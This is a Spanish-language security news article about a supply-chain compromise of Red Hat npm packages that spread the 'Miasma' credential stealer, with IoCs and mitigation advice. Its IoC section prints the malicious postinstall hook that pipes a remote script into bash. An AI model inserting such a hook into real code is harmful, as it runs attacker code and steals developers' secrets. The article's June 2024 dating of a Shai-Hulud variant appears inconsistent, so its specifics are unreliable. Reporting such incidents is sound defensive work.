Más de 30 paquetes npm de Red Hat comprometidos para distribuir malware “Miasma” en un sofisticado ataque a la cadena de suministro

## Introducción

Durante la última semana, la comunidad de ciberseguridad ha sido testigo de un incidente significativo: más de 30 paquetes npm gestionados bajo el espacio de nombres ‘@redhat-cloud-services’ de Red Hat han sido comprometidos en un ataque a la cadena de suministro. El objetivo final ha sido la distribución de una nueva variante del malware Shai-Hulud, denominada “Miasma”, especializado en el robo de credenciales. Este incidente pone de manifiesto la creciente sofisticación de los ataques dirigidos a los ecosistemas de desarrollo y la importancia crítica de la seguridad en la cadena de suministro de software.

## Contexto del Incidente

El ataque se detectó a principios de semana tras la identificación de actividad anómala en varios paquetes npm publicados bajo el namespace oficial de Red Hat en npm, ‘@redhat-cloud-services’. Estos paquetes, ampliamente utilizados en entornos empresariales y de desarrollo de infraestructuras cloud, fueron modificados por actores maliciosos para incluir código que descargaba y ejecutaba la variante “Miasma” del conocido stealer Shai-Hulud.

La intrusión afecta a algo más de 30 paquetes, entre ellos bibliotecas ampliamente integradas en pipelines CI/CD y plataformas de automatización cloud. El vector de acceso inicial todavía está bajo investigación, aunque los primeros indicios apuntan a la posible filtración de credenciales de mantenimiento o el abuso de permisos en cuentas de desarrolladores con acceso a la publicación de paquetes en npm.

## Detalles Técnicos

### Identificadores y vectores de ataque

Hasta el momento, no se ha asignado un CVE específico al incidente, pero el vector de ataque se alinea con las técnicas T1195 (Supply Chain Compromise) y T1078 (Valid Accounts) del framework MITRE ATT&CK. El malware se infiltraba en los sistemas de los desarrolladores y servidores CI/CD durante la instalación de los paquetes comprometidos, ejecutando scripts postinstalación ofuscados para descargar la carga maliciosa.

### Funcionalidad del malware “Miasma”

El payload, identificado como una variante de Shai-Hulud y rebautizado como “Miasma”, está diseñado para:

– Exfiltrar credenciales SSH, tokens de AWS, Azure y Google Cloud, y variables de entorno sensibles.
– Monitorear archivos de configuración (como `.npmrc`, `.env`, `config.json`) en busca de secretos.
– Utilizar canales cifrados para la exfiltración de datos, empleando técnicas similares a las vistas en Cobalt Strike y Metasploit para evitar la detección.
– Persistencia mediante la modificación de scripts de arranque y cron jobs.

### Indicadores de Compromiso (IoC)

– Dominios C2 observados: `api.miasma[.]cloud`, `cdn.shaihulud[.]xyz`
– Hashes SHA256 de las variantes detectadas:
– `f91c8e8c1e…`
– `ac3be4b2e4…`
– Comando de instalación malicioso inyectado en `package.json`:
«`
«scripts»: {
«postinstall»: «curl -sSL http://cdn.shaihulud[.]xyz/bin/miasma.sh | bash»
}
«`

## Impacto y Riesgos

El compromiso afecta a entornos de desarrollo, integración y despliegue que hayan instalado o actualizado alguno de los paquetes comprometidos entre el 18 y el 25 de junio de 2024, con un alcance potencial en cientos de organizaciones que utilizan Red Hat Cloud Services en sus flujos de trabajo. Los riesgos principales incluyen:

– Robo de credenciales de acceso a infraestructuras cloud y repositorios de código.
– Escalada de privilegios y movimientos laterales en entornos corporativos.
– Compromiso de la cadena de suministro con potencial para ataques downstream a clientes finales.
– Incumplimiento de normativas como GDPR y NIS2 en caso de fuga de datos personales o confidenciales.

## Medidas de Mitigación y Recomendaciones

– **Auditoría inmediata de dependencias**: Verificar si se han instalado versiones comprometidas de los paquetes afectados y revertir a versiones previas seguras.
– **Rotación de credenciales**: Cambiar todas las claves y tokens almacenados en los sistemas donde se detectó la presencia de los paquetes maliciosos.
– **Monitorización de logs y anomalías**: Revisar logs de actividad y buscar conexiones sospechosas a los dominios C2 identificados.
– **Implementar controles de acceso más estrictos**: Aplicar el principio de mínimo privilegio en cuentas de desarrolladores y limitar los permisos de publicación en npm.
– **Uso de soluciones SCA (Software Composition Analysis)**: Herramientas como Snyk, Sonatype o OWASP Dependency-Check para detectar dependencias vulnerables en tiempo real.
– **Segmentación de entornos CI/CD**: Evitar que los servidores de integración accedan a secretos o recursos críticos innecesarios.

## Opinión de Expertos

Según declaraciones de analistas de amenazas de Recorded Future y SANS Institute, este incidente representa una evolución en los ataques a la cadena de suministro: “Estamos viendo cómo los adversarios priorizan la infiltración en ecosistemas de desarrollo, donde la confianza en los repositorios públicos puede convertirse en el eslabón más débil”, afirma Laura García, Threat Intelligence Lead en SANS. Por su parte, expertos de Red Hat han confirmado que ya trabajan con npm para retirar los paquetes afectados y fortalecer los controles de acceso, subrayando la importancia de la autenticación multifactor y la gestión segura de credenciales.

## Implicaciones para Empresas y Usuarios

Para las empresas, el incidente implica la necesidad de reforzar la seguridad en la cadena de suministro y revisar políticas de integración de dependencias externas. Los usuarios individuales y desarrolladores deben extremar la precaución al instalar paquetes de fuentes públicas, incluso de namespaces oficiales, y considerar la verificación criptográfica de los artefactos en entornos críticos.

Este evento también podría desencadenar investigaciones regulatorias bajo el RGPD en la UE y la directiva NIS2, especialmente si la fuga de credenciales deriva en accesos no autorizados a datos personales o infraestructuras esenciales.

## Conclusiones

El ataque a los paquetes npm bajo el namespace ‘@redhat-cloud-services’ demuestra la urgencia de adoptar estrategias de seguridad holísticas en la cadena de suministro de software. La confianza en repositorios públicos, aunque necesaria, debe ir acompañada de controles técnicos y organizativos sólidos. La comunidad de ciberseguridad debe continuar invirtiendo en monitorización, respuesta temprana y formación para mitigar el impacto de amenazas cada vez más sofisticadas.

(Fuente: www.bleepingcomputer.com)